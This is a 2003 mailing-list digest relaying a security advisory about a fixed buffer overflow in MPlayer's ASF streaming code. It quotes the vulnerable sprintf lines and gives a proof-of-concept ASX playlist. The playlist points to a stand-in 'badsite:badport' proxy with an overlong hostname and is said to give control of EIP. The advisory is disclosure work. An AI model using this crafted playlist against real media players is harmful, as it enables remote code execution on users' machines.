[Please upgrade if you use mplayer -- Raju] This is an RFC 1153 digest. (1 message) ----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]> From: "Otero, Hernan" <[EMAIL PROTECTED]> To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]> Subject: Mplayer Buffer Overflow Date: Thu, 25 Sep 2003 19:17:49 -0500 Favorite Linux Player Buffer Overflow Product: Mplayer Developers: http://www.mplayerhq.hu OS: Port to All *NIX and Win32 Remote Exploitable: YES Developers has been contacted, problem was fixed, recomended update your mplayer version. In the source tree there is a file called asf_streaming.c this file has a function named asf_http_request, that function has two buffer overflows, this overflows are in the sprintf lines. asf_http_request { char str[250]; .... ... .. sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port ); .... ... .. sprintf( str, "Host: %s:%d", url->hostname, url->port ); .... ... .. } This, at a first look, may look as it can�t be exploited ( because the MAXHOSTLEN size restriction )... but if in an ASX file like this with a "badsite" listening in "badport" send "\n\n" as answer you could lead to a fully controllable EIP buffer overflow <asx version = "3.0"> <title>Bas Site ASX</title> <moreinfo href = "mailto:[EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> " /> <logo href = "http://www.badsite.com/streaming/grupo.gif <http://www.badsite.com/streaming/grupo.gif> " style="ICON" /> <banner href= "images/bannermitre.gif"> <abstract>Bad Site live</abstract> <moreinfo target="_blank" href = "http://www.badsite.com/ <http://www.badsite.com/> " /> </banner> <entry> <title>NEWS</title> <AUTHOR>NEWS</AUTHOR> <COPYRIGHT>� All by the news</COPYRIGHT> <ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa"/> <logo href = "http://www.badsite.com/streaming/grupo.gif <http://badsite.com/streaming/grupo.gif> " style="ICON" /> </entry> </asx> Regards, Hern�n Otero [EMAIL PROTECTED] ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F All your domain are belong to us. It is the mind that moves _______________________________________________ ilugd mailing list [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd
